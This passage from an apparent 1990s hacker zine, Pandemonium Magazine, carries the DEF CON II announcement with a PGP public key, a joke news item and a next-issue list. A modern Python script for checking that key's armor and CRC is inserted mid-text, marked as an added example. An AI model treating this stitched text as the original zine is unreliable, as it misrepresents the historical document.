We are still lining up speakers, but we have several people who have expressed interest in speaking, including Dr. Mark Ludwig (Little Black Book Of Computer Viruses), Phillip Zimmerman (PGP), Loyd Blankenship (Steve Jackson Games), Ken Phillips (Meta Information), and Jackal (Radio) to name a few. We are still contacting various groups and individuals, and don't want to say anything until we are as sure as we can be. If you think you are interested in speaking on a self-selected topic, please contact me. As the speaking list is completed there will be another announcement letting people know who is expected to talk, and on what topic.

WHERE THIS THING IS:

It's in Las Vegas, the town that never sleeps. Really. There are no clocks anywhere in an attempt to lull you into believing the day never ends. Talk about virtual reality; this place fits the bill with no clunky hardware. If you have a buzz you may never know the difference. It will be at the Sahara Hotel. Intel as follows:

The Sahara Hotel 1.800.634.6078
Room Rates: Single/Double $55, Suite $120 (Usually $200) + 8% tax
Transportation: Shuttles from the airport for cheap

NOTES:

Please make it clear you are registering for the DEF CON ][ convention to get the room rates. Our convention space price is based on how many people register. Register under a false name if it makes you feel better, 'cuz the more that register the better for my pocketbook.
No one under 21 can rent a room by themselves, so get your buddy who is 21 to rent for you and crash out. Don't let the hotel people get their hands on your baggage, or there is a mandatory $3 group baggage fee. Vegas has killer unions.

COST:

Cost is whatever you pay for a hotel room split however many ways, plus $15 if you preregister, or $30 at the door. This gets you a nifty 24 bit color name tag (we're gonna make it niftier this year) and your foot in the door. There are fast food places all over, and there is alcohol all over the place; the trick is to get it during a happy hour for maximum cheapness.

FOR MORE INFORMATION:

For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in /pub/defcon. There are digitized pictures, digitized speeches and text files with the latest up to date info available.
For email users, you can email dtangent@defcon.org for more information.
For Snail Mail send to DEF CON, 2702 E. Madison Street, Seattle, WA, 99207
For Voice Mail and maybe a human, 0-700-TANGENT on an AT&T phone.

A DEF CON Mailing list is maintained, and the latest announcements are mailed automatically to you. If you wish to be added to the list just send email to dtangent@defcon.org. We also maintain a chat mailing list where people can talk to one another and plan rides, talk, whatever. If you request to be on this list your email address will be shown to everyone, just so you are aware.

STUFF TO SPEND YOUR MONEY ON:

> Tapes of last year's speakers (four 90 minute tapes) are available for $20
> DEF CON I tee-shirts (white, large only) with large color logo on the front, and on the back the Fourth Amendment, past and present. This is shirt v 1.1 with no type-o's. These are $20, and sweatshirts are $25.
> Pre-Register for next year in advance for $15 and save half.
> Make all checks/money orders/etc. out to DEF CON, and mail to the address above.
If you have any confidential info to send, use this PGP key to encrypt:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3

mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
=ko7s
-----END PGP PUBLIC KEY BLOCK-----

I'm sure I am forgetting a bunch of stuff that will be fixed in future announcements. This file serves as the initial announcement so you can make your plans accordingly.

- The Dark Tangent

_______________________________________________________________________
-----------------------------------------------------------------------

NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS

Today in the news, 4 hacker types were found sifting through the garbage of a local phone company. A patrolling officer was on his normal route when he happened upon the unsuspecting youths. When questioned what they were expecting to find, they simply replied 'We were looking for food, officer'.

NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS

_______________________________________________________________________
-----------------------------------------------------------------------

Next Issue:

DEFCON II - The Experience
Encryption Part II - How to Break the code
Fuck IT, We'll Have it all DAMMIT!

For those interested in using Internet and/or who have already got themselves an account, be sure to look out for our release of the Internet Chronicles. We will be covering the basics, as well as how to set up PCUCP, and your very own FSP client. Likewise, for those not lucky enough to have their own account we will be covering how to do so, and where to start.
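The PGP block in the DEF CON announcement above is PGP 2.3 ASCII armor: a "Version:" header, a base64 body, a "=xxxx" line carrying a CRC-24 over the decoded bytes, and inside the body an old-format public-key packet followed by a user ID packet. Before encrypting anything to a key that arrived through a zine, a BBS and a text extraction, a reader should check that it decodes cleanly and says what the announcement claims. The following is an added example, not code from the announcement or from PGP: it dearmors the block exactly as printed above, checks the CRC-24 as defined in RFC 4880, walks the packet headers, and reports the key version, creation date, algorithm, modulus size, key ID (for version 2/3 keys, the low 64 bits of the modulus) and user ID.

```python
from __future__ import annotations

import base64
import datetime
import struct

# The key block exactly as printed in the DEF CON ][ announcement above.
ARMORED_KEY = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3

mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
=ko7s
-----END PGP PUBLIC KEY BLOCK-----
"""

CRC24_INIT = 0xB704CE
CRC24_POLY = 0x1864CFB
PUBLIC_KEY_TAG, USER_ID_TAG = 6, 13
ALGORITHM_NAMES = {1: "RSA"}


def crc24(data: bytes) -> int:
    """ASCII-armor checksum as specified in RFC 4880 section 6.1."""
    crc = CRC24_INIT
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC24_POLY
    return crc & 0xFFFFFF


def dearmor(text: str) -> tuple[bytes, bool]:
    """Strip the armor, base64-decode the body and verify the trailing '=xxxx' CRC-24 line."""
    lines = [line.strip() for line in text.strip().splitlines()]
    if not (lines[0].startswith("-----BEGIN PGP") and lines[-1].startswith("-----END PGP")):
        raise ValueError("not an ASCII-armored PGP block")
    body = lines[1:-1]
    if "" in body:  # armor headers such as "Version: 2.3" end at the first blank line
        body = body[body.index("") + 1:]
    body = [line for line in body if line]
    crc_line = body.pop() if body and body[-1].startswith("=") else None
    data = base64.b64decode("".join(body))
    crc_ok = crc_line is not None and base64.b64decode(crc_line[1:]) == crc24(data).to_bytes(3, "big")
    return data, crc_ok


def parse_packets(data: bytes) -> list[tuple[int, bytes]]:
    """Walk old-format packet headers (what PGP 2.x wrote): tag in bits 5-2, length type in bits 1-0."""
    packets, pos = [], 0
    while pos < len(data):
        ctb = data[pos]
        if not ctb & 0x80 or ctb & 0x40:
            raise ValueError(f"not an old-format packet header at offset {pos}")
        tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
        if ltype == 3:
            raise ValueError("indeterminate-length packet not supported")
        nlen = 1 << ltype  # 1, 2 or 4 length bytes follow the tag byte
        length = int.from_bytes(data[pos + 1:pos + 1 + nlen], "big")
        start = pos + 1 + nlen
        if start + length > len(data):
            raise ValueError("packet length runs past end of data")
        packets.append((tag, data[start:start + length]))
        pos = start + length
    return packets


def parse_v3_public_key(body: bytes) -> dict:
    """Version 2/3 RSA public-key packet; the key ID of such keys is the low 64 bits of the modulus."""
    version = body[0]
    created, validity_days, algo = struct.unpack(">IHB", body[1:8])
    n_bits = int.from_bytes(body[8:10], "big")
    n = body[10:10 + (n_bits + 7) // 8]
    e_off = 10 + len(n)
    e_bits = int.from_bytes(body[e_off:e_off + 2], "big")
    e = int.from_bytes(body[e_off + 2:e_off + 2 + (e_bits + 7) // 8], "big")
    created_utc = datetime.datetime.fromtimestamp(created, datetime.timezone.utc).strftime("%Y-%m-%d")
    return {"version": version, "created": created, "created_utc": created_utc,
            "validity_days": validity_days, "algorithm": ALGORITHM_NAMES.get(algo, f"unknown({algo})"),
            "n_bits": n_bits, "e": e, "key_id": n[-8:].hex().upper()}


def inspect_key(armored: str) -> dict:
    """Dearmor, check the CRC, and summarise what the key block actually contains."""
    data, crc_ok = dearmor(armored)
    info = {"crc_ok": crc_ok, "bytes": len(data), "tags": []}
    for tag, body in parse_packets(data):
        info["tags"].append(tag)
        if tag == PUBLIC_KEY_TAG:
            info.update(parse_v3_public_key(body))
        elif tag == USER_ID_TAG:
            info["user_id"] = body.decode("latin-1")
    return info


if __name__ == "__main__":
    for field, value in inspect_key(ARMORED_KEY).items():
        print(f"{field}: {value}")
```

The crc_ok field tells you whether the block survived transcription intact; a single changed character in the base64 body shows up there, and a false value means the key should be fetched again from the announcement's ftp site or mailing list rather than used. The CRC protects against accidental damage only, not substitution: whether the key actually belongs to the person named in the user ID is a separate question that the armor cannot answer.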
_______________________________________________________________________
-----------------------------------------------------------------------

This concludes the first release of Pandemonium Magazine. Thanks to all who helped support the magazine, and be sure to notify me at the following number if you wish to help contribute to our cause. Likewise, give it a call if you wish to share your views with your fellow hobbyists.

Paradigm [Spectre Coordinator]
The AfterMath - Spectre/Pandemonium Mag WHQ - [206]230-0424 - [206]230-0490

_______________________________________________________________________
-----------------------------------------------------------------------